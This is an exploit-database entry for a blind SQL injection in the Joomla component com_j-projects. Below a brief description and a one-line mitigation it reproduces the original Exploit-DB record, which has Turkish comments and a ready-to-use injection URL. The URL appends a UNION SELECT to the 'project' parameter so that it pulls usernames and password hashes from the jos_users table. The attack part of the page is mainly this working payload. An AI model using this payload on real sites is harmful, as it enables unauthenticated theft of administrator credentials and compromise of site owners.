header-logo
Suggest Exploit
vendor:
com_j-projects
by:
Pyske
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: com_j-projects
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_j-projects Blind SQL Injection Vulnerability

An unauthenticated attacker can exploit a blind SQL injection vulnerability in the Joomla component com_j-projects. By manipulating the 'project' parameter in the 'index.php' file, an attacker can inject malicious SQL queries and gain access to the admin login credentials.

Mitigation:

Input validation should be used to filter out malicious characters.
Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#############################################################
# Joomla Component com_j-projects Blind SQL Injection Vulnerability
#############################################################

# Author : Pyske


# Name : com_j-projects


# Bug Type : Blind SQL Injection


# Infection : Admin login bilgileri al?nabilir.




# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path /index.php?option=com_j-projects&Itemid=102&cat=5&task=projects&project=30/**/and/**/1=0/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users

< -- bug code end of -- >